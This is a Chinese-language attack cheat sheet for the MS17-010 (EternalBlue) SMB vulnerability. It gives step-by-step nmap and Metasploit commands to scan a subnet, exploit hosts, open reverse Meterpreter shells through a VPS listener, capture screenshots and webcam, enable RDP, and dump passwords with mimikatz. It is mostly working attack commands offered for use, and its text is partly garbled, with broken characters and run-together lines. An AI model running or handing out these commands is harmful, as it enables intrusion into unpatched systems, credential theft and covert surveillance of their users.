0x01 常規打法 掃描是否存在ms17-010漏洞:
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --openMSF常規漏洞利用:
msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 反向打:msf > set payload windows/x64/meterpreter/reverse_tcp msf > set lhost 192.168.1.118正向打:msf > set payload windows/x64/meterpreter/bind_tcp常用功能:
桌面抓圖 meterpreter > screenshot視頻開啟 meterpreter > webcam_scream開啟遠程桌面 meterpreter > run post/windows/manage/enable_rdp 目標密碼破解第一步:載入mimikatzmeterpreter > load mimikatz第二步:使用命令wdigest獲取密碼meterpreter >wdigest0x02 反彈到VPS穩定打法 (常規打不好使的情況下�。)
1.環境 vps 140.x.x.x 目標 192.168.3.123 本地kali 192.168.3.62
2.vps開啟監聽�����。
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 443exploit -j -z 3.kali下開始攻擊�。
use exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.3.123set payload windows/x64/meterpreter/reverse_tcpset lhost 140.x.x.x #反彈到vpsset lport 443 run到下圖界面Ctrl+C
4.vps收到meterpreter��。(如果不穩定就多打幾次)
0x03 目標為Win2003情況下穩定打 方法一(命令執行)
msf5 > use auxiliary/admin/smb/ms17_010_commandmsf5 > set command whoamimsf5 > set rhosts x.x.x.x 方法二(返回meterpreter)
131363.html
